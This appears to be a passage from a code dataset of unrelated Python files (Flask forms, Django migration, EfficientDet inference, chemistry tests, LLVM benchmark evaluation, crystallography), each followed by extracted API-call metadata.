'lib.setAttr', (['shader', 'dx2sfxAttr[attr]', 'textureDir'], {}), '(shader, dx2sfxAttr[attr], textureDir)\n', (12042, 12080), True, 'import coopLib as lib\n'), ((17266, 17390), 'maya.cmds.playblast', 'cmds.playblast', ([], {'f': 'saveDir', 'format': '"""avi"""', 'w': 'width', 'h': 'height', 'percent': '(100)', 'qlt': '(100)', 'v': '(True)', 'fo': '(True)', 'os': '(True)', 's': 'audioNode'}), "(f=saveDir, format='avi', w=width, h=height, percent=100, qlt\n =100, v=True, fo=True, os=True, s=audioNode)\n", (17280, 17390), True, 'import maya.cmds as cmds\n'), ((19130, 19175), 'maya.cmds.error', 'cmds.error', (['"""Frame capture cancelled by user"""'], {}), "('Frame capture cancelled by user')\n", (19140, 19175), True, 'import maya.cmds as cmds\n'), ((17454, 17554), 'maya.cmds.error', 'cmds.error', (['"""Video cannot be playblasted as qt or avi, please check the installed codecs."""'], {}), "(\n 'Video cannot be playblasted as qt or avi, please check the installed codecs.'\n )\n", (17464, 17554), True, 'import maya.cmds as cmds\n')] |
# blogs_posts/forms.py
from flask_wtf import FlaskForm
from wtforms import StringField, TextAreaField, SubmitField
from wtforms.validators import DataRequired
class BlogPostForm(FlaskForm):
title = StringField("Title", validators=[DataRequired()])
text = TextAreaField("Text", validators=[DataRequired()])
submit = SubmitField("Post")
| [
"wtforms.validators.DataRequired",
"wtforms.SubmitField"
] | [((330, 349), 'wtforms.SubmitField', 'SubmitField', (['"""Post"""'], {}), "('Post')\n", (341, 349), False, 'from wtforms import StringField, TextAreaField, SubmitField\n'), ((238, 252), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (250, 252), False, 'from wtforms.validators import DataRequired\n'), ((300, 314), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (312, 314), False, 'from wtforms.validators import DataRequired\n')] |
# Generated by Django 3.1.7 on 2021-02-26 08:07
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255, null=True, unique=True)),
],
),
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255, null=True, unique=True)),
],
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, null=True)),
('updated', models.DateTimeField(auto_now_add=True, null=True)),
('title', models.CharField(max_length=255, null=True)),
('body', models.TextField(blank=True, null=True)),
('category', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='blog.category')),
('tag', models.ManyToManyField(blank=True, to='blog.Tag')),
],
),
]
| [
"django.db.models.TextField",
"django.db.models.ForeignKey",
"django.db.models.ManyToManyField",
"django.db.models.AutoField",
"django.db.models.DateTimeField",
"django.db.models.CharField"
] | [((337, 430), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (353, 430), False, 'from django.db import migrations, models\n'), ((454, 510), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'null': '(True)', 'unique': '(True)'}), '(max_length=255, null=True, unique=True)\n', (470, 510), False, 'from django.db import migrations, models\n'), ((639, 732), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (655, 732), False, 'from django.db import migrations, models\n'), ((756, 812), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'null': '(True)', 'unique': '(True)'}), '(max_length=255, null=True, unique=True)\n', (772, 812), False, 'from django.db import migrations, models\n'), ((942, 1035), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (958, 1035), False, 'from django.db import migrations, models\n'), ((1062, 1112), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'null': '(True)'}), '(auto_now_add=True, null=True)\n', (1082, 1112), False, 'from django.db import migrations, models\n'), ((1143, 1193), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'null': '(True)'}), '(auto_now_add=True, null=True)\n', (1163, 1193), False, 'from django.db import migrations, models\n'), ((1222, 1265), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'null': '(True)'}), '(max_length=255, null=True)\n', (1238, 1265), False, 'from django.db import migrations, models\n'), ((1293, 1332), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'null': '(True)'}), '(blank=True, null=True)\n', (1309, 1332), False, 'from django.db import migrations, models\n'), ((1364, 1461), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'null': '(True)', 'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""blog.category"""'}), "(null=True, on_delete=django.db.models.deletion.CASCADE,\n to='blog.category')\n", (1381, 1461), False, 'from django.db import migrations, models\n'), ((1484, 1533), 'django.db.models.ManyToManyField', 'models.ManyToManyField', ([], {'blank': '(True)', 'to': '"""blog.Tag"""'}), "(blank=True, to='blog.Tag')\n", (1506, 1533), False, 'from django.db import migrations, models\n')] |
from model import efficientdet
import cv2
import os
import numpy as np
import time
from utils import preprocess_image
from utils.anchors import anchors_for_shape
from utils.draw_boxes import draw_boxes
from utils.post_process_boxes import post_process_boxes
def main():
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
phi = 1
weighted_bifpn = False
model_path = 'checkpoints/2019-12-03/pascal_05_0.6283_1.1975_0.8029.h5'
image_sizes = (512, 640, 768, 896, 1024, 1280, 1408)
image_size = image_sizes[phi]
classes = ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable',
'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']
num_classes = len(classes)
score_threshold = 0.5
colors = [np.random.randint(0, 256, 3).tolist() for _ in range(num_classes)]
model, prediction_model = efficientdet(phi=phi,
weighted_bifpn=weighted_bifpn,
num_classes=num_classes,
score_threshold=score_threshold)
prediction_model.load_weights(model_path, by_name=True)
image_path = 'datasets/VOC2007/JPEGImages/000002.jpg'
image = cv2.imread(image_path)
src_image = image.copy()
image = image[:, :, ::-1]
h, w = image.shape[:2]
image, scale, offset_h, offset_w = preprocess_image(image, image_size=image_size)
anchors = anchors_for_shape((image_size, image_size))
# run network
start = time.time()
boxes, scores, labels = prediction_model.predict_on_batch([np.expand_dims(image, axis=0),
np.expand_dims(anchors, axis=0)])
boxes, scores, labels = np.squeeze(boxes), np.squeeze(scores), np.squeeze(labels)
print(time.time() - start)
boxes = post_process_boxes(boxes=boxes,
scale=scale,
offset_h=offset_h,
offset_w=offset_w,
height=h,
width=w)
# select indices which have a score above the threshold
indices = np.where(scores[:] > score_threshold)[0]
# select those detections
boxes = boxes[indices]
labels = labels[indices]
draw_boxes(src_image, boxes, scores, labels, colors, classes)
cv2.namedWindow('image', cv2.WINDOW_NORMAL)
cv2.imshow('image', src_image)
cv2.waitKey(0)
if __name__ == '__main__':
main()
| [
"utils.preprocess_image",
"utils.anchors.anchors_for_shape",
"numpy.where",
"utils.draw_boxes.draw_boxes",
"utils.post_process_boxes.post_process_boxes",
"cv2.imshow",
"numpy.squeeze",
"cv2.waitKey",
"numpy.random.randint",
"model.efficientdet",
"numpy.expand_dims",
"time.time",
"cv2.namedWi... | [((921, 1036), 'model.efficientdet', 'efficientdet', ([], {'phi': 'phi', 'weighted_bifpn': 'weighted_bifpn', 'num_classes': 'num_classes', 'score_threshold': 'score_threshold'}), '(phi=phi, weighted_bifpn=weighted_bifpn, num_classes=\n num_classes, score_threshold=score_threshold)\n', (933, 1036), False, 'from model import efficientdet\n'), ((1296, 1318), 'cv2.imread', 'cv2.imread', (['image_path'], {}), '(image_path)\n', (1306, 1318), False, 'import cv2\n'), ((1449, 1495), 'utils.preprocess_image', 'preprocess_image', (['image'], {'image_size': 'image_size'}), '(image, image_size=image_size)\n', (1465, 1495), False, 'from utils import preprocess_image\n'), ((1510, 1553), 'utils.anchors.anchors_for_shape', 'anchors_for_shape', (['(image_size, image_size)'], {}), '((image_size, image_size))\n', (1527, 1553), False, 'from utils.anchors import anchors_for_shape\n'), ((1589, 1600), 'time.time', 'time.time', ([], {}), '()\n', (1598, 1600), False, 'import time\n'), ((1921, 2027), 'utils.post_process_boxes.post_process_boxes', 'post_process_boxes', ([], {'boxes': 'boxes', 'scale': 'scale', 'offset_h': 'offset_h', 'offset_w': 'offset_w', 'height': 'h', 'width': 'w'}), '(boxes=boxes, scale=scale, offset_h=offset_h, offset_w=\n offset_w, height=h, width=w)\n', (1939, 2027), False, 'from utils.post_process_boxes import post_process_boxes\n'), ((2398, 2459), 'utils.draw_boxes.draw_boxes', 'draw_boxes', (['src_image', 'boxes', 'scores', 'labels', 'colors', 'classes'], {}), '(src_image, boxes, scores, labels, colors, classes)\n', (2408, 2459), False, 'from utils.draw_boxes import draw_boxes\n'), ((2469, 2512), 'cv2.namedWindow', 'cv2.namedWindow', (['"""image"""', 'cv2.WINDOW_NORMAL'], {}), "('image', cv2.WINDOW_NORMAL)\n", (2484, 2512), False, 'import cv2\n'), ((2517, 2547), 'cv2.imshow', 'cv2.imshow', (['"""image"""', 'src_image'], {}), "('image', src_image)\n", (2527, 2547), False, 'import cv2\n'), ((2552, 2566), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (2563, 2566), False, 'import cv2\n'), ((1820, 1837), 'numpy.squeeze', 'np.squeeze', (['boxes'], {}), '(boxes)\n', (1830, 1837), True, 'import numpy as np\n'), ((1839, 1857), 'numpy.squeeze', 'np.squeeze', (['scores'], {}), '(scores)\n', (1849, 1857), True, 'import numpy as np\n'), ((1859, 1877), 'numpy.squeeze', 'np.squeeze', (['labels'], {}), '(labels)\n', (1869, 1877), True, 'import numpy as np\n'), ((2257, 2294), 'numpy.where', 'np.where', (['(scores[:] > score_threshold)'], {}), '(scores[:] > score_threshold)\n', (2265, 2294), True, 'import numpy as np\n'), ((1664, 1693), 'numpy.expand_dims', 'np.expand_dims', (['image'], {'axis': '(0)'}), '(image, axis=0)\n', (1678, 1693), True, 'import numpy as np\n'), ((1758, 1789), 'numpy.expand_dims', 'np.expand_dims', (['anchors'], {'axis': '(0)'}), '(anchors, axis=0)\n', (1772, 1789), True, 'import numpy as np\n'), ((1888, 1899), 'time.time', 'time.time', ([], {}), '()\n', (1897, 1899), False, 'import time\n'), ((824, 852), 'numpy.random.randint', 'np.random.randint', (['(0)', '(256)', '(3)'], {}), '(0, 256, 3)\n', (841, 852), True, 'import numpy as np\n')] |
"""Stake Program Constants."""
from solana.publickey import PublicKey
STAKE_PROGRAM_ID: PublicKey = PublicKey("Stake11111111111111111111111111111111111111")
"""Public key that identifies the Stake program."""
SYSVAR_STAKE_CONFIG_ID: PublicKey = PublicKey("StakeConfig11111111111111111111111111111111")
"""Public key that identifies the Stake config sysvar."""
STAKE_LEN: int = 200
"""Size of stake account."""
LAMPORTS_PER_SOL: int = 1_000_000_000
"""Number of lamports per SOL"""
MINIMUM_DELEGATION: int = LAMPORTS_PER_SOL
"""Minimum delegation allowed by the stake program"""
| [
"solana.publickey.PublicKey"
] | [((102, 158), 'solana.publickey.PublicKey', 'PublicKey', (['"""Stake11111111111111111111111111111111111111"""'], {}), "('Stake11111111111111111111111111111111111111')\n", (111, 158), False, 'from solana.publickey import PublicKey\n'), ((248, 304), 'solana.publickey.PublicKey', 'PublicKey', (['"""StakeConfig11111111111111111111111111111111"""'], {}), "('StakeConfig11111111111111111111111111111111')\n", (257, 304), False, 'from solana.publickey import PublicKey\n')] |
import pytest
from rdkit import Chem
from aizynthfinder.chem import MoleculeException, Molecule
def test_no_input():
with pytest.raises(MoleculeException):
Molecule()
def test_create_with_mol():
rd_mol = Chem.MolFromSmiles("O")
mol = Molecule(rd_mol=rd_mol)
assert mol.smiles == "O"
def test_create_with_smiles():
mol = Molecule(smiles="O")
assert Chem.MolToSmiles(mol.rd_mol) == "O"
def test_inchi():
mol = Molecule(smiles="O")
assert mol.inchi == "InChI=1S/H2O/h1H2"
def test_inchi_key():
mol = Molecule(smiles="O")
assert mol.inchi_key == "<KEY>"
def test_fingerprint():
mol = Molecule(smiles="O")
assert sum(mol.fingerprint(2)) == 1
assert sum(mol.fingerprint(2, 10)) == 1
def test_sanitize():
mol = Molecule(smiles="O", sanitize=True)
assert Chem.MolToSmiles(mol.rd_mol) == "O"
mol = Molecule(smiles="c1ccccc1(C)(C)")
with pytest.raises(MoleculeException):
mol.sanitize()
mol.sanitize(raise_exception=False)
assert mol.smiles == "CC1(C)CCCCC1"
def test_equality():
mol1 = Molecule(smiles="CCCCO")
mol2 = Molecule(smiles="OCCCC")
assert mol1 == mol2
def test_basic_equality():
mol1 = Molecule(smiles="CC[C@@H](C)O") # R-2-butanol
mol2 = Molecule(smiles="CC[C@H](C)O") # S-2-butanol
assert mol1 != mol2
assert mol1.basic_compare(mol2)
def test_has_atom_mapping():
mol1 = Molecule(smiles="CCCCO")
mol2 = Molecule(smiles="C[C:5]CCO")
assert not mol1.has_atom_mapping()
assert mol2.has_atom_mapping()
def test_remove_atom_mapping():
mol = Molecule(smiles="C[C:5]CCO")
assert mol.has_atom_mapping()
mol.remove_atom_mapping()
assert not mol.has_atom_mapping()
| [
"aizynthfinder.chem.Molecule",
"rdkit.Chem.MolFromSmiles",
"rdkit.Chem.MolToSmiles",
"pytest.raises"
] | [((225, 248), 'rdkit.Chem.MolFromSmiles', 'Chem.MolFromSmiles', (['"""O"""'], {}), "('O')\n", (243, 248), False, 'from rdkit import Chem\n'), ((260, 283), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'rd_mol': 'rd_mol'}), '(rd_mol=rd_mol)\n', (268, 283), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((357, 377), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""O"""'}), "(smiles='O')\n", (365, 377), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((456, 476), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""O"""'}), "(smiles='O')\n", (464, 476), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((556, 576), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""O"""'}), "(smiles='O')\n", (564, 576), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((650, 670), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""O"""'}), "(smiles='O')\n", (658, 670), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((790, 825), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""O"""', 'sanitize': '(True)'}), "(smiles='O', sanitize=True)\n", (798, 825), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((885, 918), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""c1ccccc1(C)(C)"""'}), "(smiles='c1ccccc1(C)(C)')\n", (893, 918), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((1101, 1125), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""CCCCO"""'}), "(smiles='CCCCO')\n", (1109, 1125), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((1137, 1161), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""OCCCC"""'}), "(smiles='OCCCC')\n", (1145, 1161), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((1227, 1258), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""CC[C@@H](C)O"""'}), "(smiles='CC[C@@H](C)O')\n", (1235, 1258), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((1285, 1315), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""CC[C@H](C)O"""'}), "(smiles='CC[C@H](C)O')\n", (1293, 1315), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((1434, 1458), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""CCCCO"""'}), "(smiles='CCCCO')\n", (1442, 1458), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((1470, 1498), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""C[C:5]CCO"""'}), "(smiles='C[C:5]CCO')\n", (1478, 1498), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((1618, 1646), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {'smiles': '"""C[C:5]CCO"""'}), "(smiles='C[C:5]CCO')\n", (1626, 1646), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((129, 161), 'pytest.raises', 'pytest.raises', (['MoleculeException'], {}), '(MoleculeException)\n', (142, 161), False, 'import pytest\n'), ((171, 181), 'aizynthfinder.chem.Molecule', 'Molecule', ([], {}), '()\n', (179, 181), False, 'from aizynthfinder.chem import MoleculeException, Molecule\n'), ((390, 418), 'rdkit.Chem.MolToSmiles', 'Chem.MolToSmiles', (['mol.rd_mol'], {}), '(mol.rd_mol)\n', (406, 418), False, 'from rdkit import Chem\n'), ((838, 866), 'rdkit.Chem.MolToSmiles', 'Chem.MolToSmiles', (['mol.rd_mol'], {}), '(mol.rd_mol)\n', (854, 866), False, 'from rdkit import Chem\n'), ((929, 961), 'pytest.raises', 'pytest.raises', (['MoleculeException'], {}), '(MoleculeException)\n', (942, 961), False, 'import pytest\n')] |
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import json
from typing import Any, Dict
from .imports import FileImport
class Config:
def __init__(self, default_version_metadata: Dict[str, Any]):
self.credential = default_version_metadata["config"]["credential"]
self.credential_scopes = default_version_metadata["config"]["credential_scopes"]
self.credential_default_policy_type = default_version_metadata["config"]["credential_default_policy_type"]
self.credential_default_policy_type_has_async_version = (
default_version_metadata["config"]["credential_default_policy_type_has_async_version"]
)
self.credential_key_header_name = default_version_metadata["config"]["credential_key_header_name"]
self.default_version_metadata = default_version_metadata
def imports(self, async_mode: bool) -> FileImport:
imports_to_load = "async_imports" if async_mode else "sync_imports"
return FileImport(json.loads(self.default_version_metadata['config'][imports_to_load]))
| [
"json.loads"
] | [((1248, 1316), 'json.loads', 'json.loads', (["self.default_version_metadata['config'][imports_to_load]"], {}), "(self.default_version_metadata['config'][imports_to_load])\n", (1258, 1316), False, 'import json\n')] |
import tensorflow as tf
def sum():
return tf.ones([2,2,2])
def resize_by_axis(image, dim_1, dim_2, ax):
resized_list = []
unstack_img_depth_list = tf.unstack(image, axis = ax)
for i in unstack_img_depth_list:
resized_list.append(tf.image.resize(i, [dim_1, dim_2]))
stack_img = tf.stack(resized_list, axis=ax)
return stack_img
def resize_voxel(vox,dims):
dim_1,dim_2,dim_3 = dims
resized_along_depth = resize_by_axis(vox,dim_1,dim_2,3)
resized_along_width = resize_by_axis(resized_along_depth,dim_1,dim_3,2)
return resized_along_width
# resized_along_depth = resize_by_axis(x,50,60,2, True)
# resized_along_width = resize_by_axis(resized_along_depth,50,70,1,True) | [
"tensorflow.unstack",
"tensorflow.image.resize",
"tensorflow.stack",
"tensorflow.ones"
] | [((44, 62), 'tensorflow.ones', 'tf.ones', (['[2, 2, 2]'], {}), '([2, 2, 2])\n', (51, 62), True, 'import tensorflow as tf\n'), ((151, 177), 'tensorflow.unstack', 'tf.unstack', (['image'], {'axis': 'ax'}), '(image, axis=ax)\n', (161, 177), True, 'import tensorflow as tf\n'), ((285, 316), 'tensorflow.stack', 'tf.stack', (['resized_list'], {'axis': 'ax'}), '(resized_list, axis=ax)\n', (293, 316), True, 'import tensorflow as tf\n'), ((236, 270), 'tensorflow.image.resize', 'tf.image.resize', (['i', '[dim_1, dim_2]'], {}), '(i, [dim_1, dim_2])\n', (251, 270), True, 'import tensorflow as tf\n')] |
#!/usr/bin/env python3
import os, sys, signal
import multiprocessing
import subprocess as sp
import shutil
import shlex
import psutil
import time
import csv
import json
import pytz
from datetime import datetime
import Lib as lib
sys.path.append('/home/jrchang/workspace/gym-OptClang/gym_OptClang/envs/')
import RemoteWorker as rwork
def getTargets(path):
"""
path: the root path for "test-suite" to search ".test" file
"""
prog = rwork.Programs()
AllTargetsDict = prog.getAvailablePrograms()
ListOfAvailableTarget = list(AllTargetsDict.keys())
# search all test target in Apps
AppTargets = {}
test_pattern = '.test'
for root, dirs, files in os.walk(path):
for file in files:
if file.endswith(test_pattern):
# remove .test in the file name
file = file[:-5]
# filter out those are not in our consideration.
if file in ListOfAvailableTarget:
AppTargets[file] = root
return AppTargets
def Eval(TargetDict, WorkerID):
"""
TargetDict = {"target": "target root path"}
return BuildTimeDict = {"target": run-time}
"""
RunCyclesDict = {}
prevCwd = os.getcwd()
actor = lib.EnvResponseActor()
for target, targetRoot in TargetDict.items():
isBuilt = False
retStatus = actor.EnvEcho(target, WorkerID, TargetDict, ParallelBuild=True)
if retStatus == "Success":
# get cycles from "RecordTargetFilePath"
'''
ex.
log file format: /tmp/PredictionDaemon/worker-[n]/[BenchmarkName].usage
record path example:
/tmp/PredictionDaemon/worker-1/bmm.usage
e.g.
bmm; cpu-cycles | 5668022249; func | matmult | 0.997
'''
RecordTargetFilePath = '/tmp/PredictionDaemon/worker-' + WorkerID + '/' + target + '.usage'
with open(RecordTargetFilePath, 'r') as recFile:
info = recFile.read()
TotalCycles = info.split(';')[1].split('|')[1].strip()
RunCyclesDict[target] = int(TotalCycles)
print("Target={}, takes {} cycles".format(target, TotalCycles))
else:
RunCyclesDict[target] = -1
os.chdir(prevCwd)
return RunCyclesDict
def runEval(WorkerID, jsonPath):
"""
TargetRoot: the root path in your test-suite/build
return {"target": {key_1: first_time, key_2: second_time}}
"""
'''
# get all .test target
Targets = getTargets(TargetRoot + '/SingleSource/Benchmarks')
Targets.update(getTargets(TargetRoot + '/MultiSource/Benchmarks'))
Targets.update(getTargets(TargetRoot + '/MultiSource/Applications'))
#Targets = {"GlobalDataFlow-dbl":"/home/jrchang/workspace/llvm-thesis-inference/test-suite/build-worker-6/MultiSource/Benchmarks/TSVC/GlobalDataFlow-dbl"}
'''
# Build, verify and log run time
builder = lib.EnvBuilder()
LitTestDict = builder.CheckTestSuiteCmake(WorkerID)
retDict = Eval(LitTestDict, WorkerID)
# record as file for logging
date = datetime.now(pytz.timezone('Asia/Taipei')).strftime("%m-%d_%H-%M")
Dir = "log-" + date
os.makedirs(Dir)
with open(Dir + '/' + jsonPath, 'w') as fp:
json.dump(retDict, fp)
return retDict
def readOriginalResults():
loc = os.getenv("LLVM_THESIS_RandomHome", "Error")
loc = loc + "/LLVMTestSuiteScript/GraphGen/output/newMeasurableStdBenchmarkMeanAndSigma"
Orig_cycles_mean = {}
Orig_cycles_sigma = {}
with open(loc, 'r') as File:
'''
e.g.
PAQ8p/paq8p; cpu-cycles-mean | 153224947840; cpu-cycles-sigma | 2111212874
'''
for line in File:
elms = line.split(';')
target = elms[0].split('/')[-1]
mean = elms[1].split('|')[1].strip()
sigma = elms[2].split('|')[1].strip()
Orig_cycles_mean[target] = int(mean)
Orig_cycles_sigma[target] = int(sigma)
return Orig_cycles_mean, Orig_cycles_sigma
if __name__ == '__main__':
WorkerID = "6"
print("-------------------------------------------")
print("Make sure your $$LLVM_THESIS_HOME point to the inference one.")
print("If you would like to change worker, modify the passed args of runEval()")
print("Default WorkerID={}".format(WorkerID))
print("-------------------------------------------")
for i in range(1):
startTime = time.perf_counter()
'''
Measure the build time for ABC
'''
key_2 = "ABC"
ABC_results = runEval(WorkerID, "ABC_cycles_mean.json")
'''
If you already ran, just read the data.
'''
#ABC_results = json.load(open("ABC_cycles_mean.json"))
# read data from previous results
# we don't have to read the original data for every time
'''
Orig_cycles_mean, Orig_cycles_sigma = readOriginalResults()
with open("Orig_cycles_mean.json", 'w') as fp:
json.dump(Orig_cycles_mean, fp)
with open("Orig_cycles_sigma.json", 'w') as fp:
json.dump(Orig_cycles_sigma, fp)
'''
endTime = time.perf_counter()
print("The evaluation procedure takse:{} mins".format((endTime - startTime)/60))
| [
"pytz.timezone",
"RemoteWorker.Programs",
"os.makedirs",
"os.getenv",
"json.dump",
"time.perf_counter",
"Lib.EnvResponseActor",
"os.getcwd",
"os.chdir",
"Lib.EnvBuilder",
"sys.path.append",
"os.walk"
] | [((230, 304), 'sys.path.append', 'sys.path.append', (['"""/home/jrchang/workspace/gym-OptClang/gym_OptClang/envs/"""'], {}), "('/home/jrchang/workspace/gym-OptClang/gym_OptClang/envs/')\n", (245, 304), False, 'import os, sys, signal\n'), ((448, 464), 'RemoteWorker.Programs', 'rwork.Programs', ([], {}), '()\n', (462, 464), True, 'import RemoteWorker as rwork\n'), ((683, 696), 'os.walk', 'os.walk', (['path'], {}), '(path)\n', (690, 696), False, 'import os, sys, signal\n'), ((1215, 1226), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1224, 1226), False, 'import os, sys, signal\n'), ((1239, 1261), 'Lib.EnvResponseActor', 'lib.EnvResponseActor', ([], {}), '()\n', (1259, 1261), True, 'import Lib as lib\n'), ((2264, 2281), 'os.chdir', 'os.chdir', (['prevCwd'], {}), '(prevCwd)\n', (2272, 2281), False, 'import os, sys, signal\n'), ((2938, 2954), 'Lib.EnvBuilder', 'lib.EnvBuilder', ([], {}), '()\n', (2952, 2954), True, 'import Lib as lib\n'), ((3192, 3208), 'os.makedirs', 'os.makedirs', (['Dir'], {}), '(Dir)\n', (3203, 3208), False, 'import os, sys, signal\n'), ((3346, 3390), 'os.getenv', 'os.getenv', (['"""LLVM_THESIS_RandomHome"""', '"""Error"""'], {}), "('LLVM_THESIS_RandomHome', 'Error')\n", (3355, 3390), False, 'import os, sys, signal\n'), ((3265, 3287), 'json.dump', 'json.dump', (['retDict', 'fp'], {}), '(retDict, fp)\n', (3274, 3287), False, 'import json\n'), ((4456, 4475), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (4473, 4475), False, 'import time\n'), ((5179, 5198), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (5196, 5198), False, 'import time\n'), ((3110, 3138), 'pytz.timezone', 'pytz.timezone', (['"""Asia/Taipei"""'], {}), "('Asia/Taipei')\n", (3123, 3138), False, 'import pytz\n')] |
#!/usr/bin/env python3
import sys
sys.path.append('../..')
import numpy as np
from neml.cp import crystallography
from neml.math import rotations
import matplotlib.pyplot as plt
if __name__ == "__main__":
N = 300
orientations = rotations.random_orientations(N)
sgroup = crystallography.SymmetryGroup("432")
angles = []
for i in range(len(orientations)):
for j in range(i+1, len(orientations)):
o1 = orientations[i]
o2 = orientations[j]
m = sgroup.misorientation(o1,o2)
axis, angle = m.to_axis_angle()
angles.append(angle)
angles = np.rad2deg(angles)
plt.figure()
plt.hist(angles, bins = 30)
plt.show()
Np = N * (N-1)
orientations1 = rotations.random_orientations(Np)
orientations2 = rotations.random_orientations(Np)
mis = sgroup.misorientation_block(orientations1, orientations2)
angles = [np.rad2deg(m.to_axis_angle()[1]) for m in mis]
plt.figure()
plt.hist(angles, bins = 30)
plt.show()
| [
"matplotlib.pyplot.hist",
"neml.cp.crystallography.SymmetryGroup",
"neml.math.rotations.random_orientations",
"matplotlib.pyplot.figure",
"numpy.rad2deg",
"sys.path.append",
"matplotlib.pyplot.show"
] | [((35, 59), 'sys.path.append', 'sys.path.append', (['"""../.."""'], {}), "('../..')\n", (50, 59), False, 'import sys\n'), ((238, 270), 'neml.math.rotations.random_orientations', 'rotations.random_orientations', (['N'], {}), '(N)\n', (267, 270), False, 'from neml.math import rotations\n'), ((283, 319), 'neml.cp.crystallography.SymmetryGroup', 'crystallography.SymmetryGroup', (['"""432"""'], {}), "('432')\n", (312, 319), False, 'from neml.cp import crystallography\n'), ((588, 606), 'numpy.rad2deg', 'np.rad2deg', (['angles'], {}), '(angles)\n', (598, 606), True, 'import numpy as np\n'), ((612, 624), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (622, 624), True, 'import matplotlib.pyplot as plt\n'), ((627, 652), 'matplotlib.pyplot.hist', 'plt.hist', (['angles'], {'bins': '(30)'}), '(angles, bins=30)\n', (635, 652), True, 'import matplotlib.pyplot as plt\n'), ((657, 667), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (665, 667), True, 'import matplotlib.pyplot as plt\n'), ((707, 740), 'neml.math.rotations.random_orientations', 'rotations.random_orientations', (['Np'], {}), '(Np)\n', (736, 740), False, 'from neml.math import rotations\n'), ((759, 792), 'neml.math.rotations.random_orientations', 'rotations.random_orientations', (['Np'], {}), '(Np)\n', (788, 792), False, 'from neml.math import rotations\n'), ((921, 933), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (931, 933), True, 'import matplotlib.pyplot as plt\n'), ((936, 961), 'matplotlib.pyplot.hist', 'plt.hist', (['angles'], {'bins': '(30)'}), '(angles, bins=30)\n', (944, 961), True, 'import matplotlib.pyplot as plt\n'), ((966, 976), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (974, 976), True, 'import matplotlib.pyplot as plt\n')] |
import numpy
